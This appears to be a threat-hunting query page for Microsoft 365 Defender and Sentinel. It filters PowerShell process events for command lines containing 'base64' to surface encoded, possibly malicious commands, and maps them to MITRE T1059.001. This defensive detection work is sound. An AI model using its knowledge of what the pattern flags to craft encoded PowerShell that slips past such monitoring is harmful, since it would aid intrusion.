Query Details
Powershell Base64 Encoding
Query
# PowerShell Base64 encoding ### Description Hunting for Base64 encoded command lines in PowerShell is crucial to detect and mitigate potential cyber threats. While the analytic below will detect Base64 encoded commands, a fine tuning is required for your environment. ### References - https://redcanary.com/threat-detection-report/techniques/powershell/ ### Microsoft 365 Defender & Microsoft Sentinel ``` DeviceProcessEvents // Define timeframe | where Timestamp > ago(1d) | where FileName has_any (@"powershell.exe", @"pwsh.exe", @"powershell_ise.exe") | where ProcessCommandLine contains "base64" | summarize arg_max(Timestamp, *) by DeviceName ``` ### MITRE ATT&CK Mapping - Tactic: Execution - Technique ID: T1059.001 - [Command and Scripting Interpreter: PowerShell](https://attack.mitre.org/techniques/T1059/001/) ### Source ### Versioning | Version | Date | Comments | | ------------- |---------------| ----------------------------------| | 1.0 | 14/08/2023 | Initial publish |
Explanation
This query is used to detect Base64 encoded command lines in PowerShell. It filters for events related to PowerShell processes and searches for the keyword "base64" in the process command line. The query then summarizes the results by the device name. It is important to note that this query may need to be adjusted for specific environments. The query is relevant for Microsoft 365 Defender and Microsoft Sentinel. It is mapped to the MITRE ATT&CK technique T1059.001 - Command and Scripting Interpreter: PowerShell. The query was initially published on 14/08/2023.
Details
Michalis Michalos
Released: August 14, 2023
Tables
DeviceProcessEvents
Keywords
DeviceProcessEvents,Timestamp,FileName,powershell.exe,pwsh.exe,powershell_ise.exe,ProcessCommandLine,base64,DeviceName
Operators
DeviceProcessEventswhereTimestampagowhereFileNamehas_anywhereProcessCommandLinecontainssummarizearg_maxbyDeviceName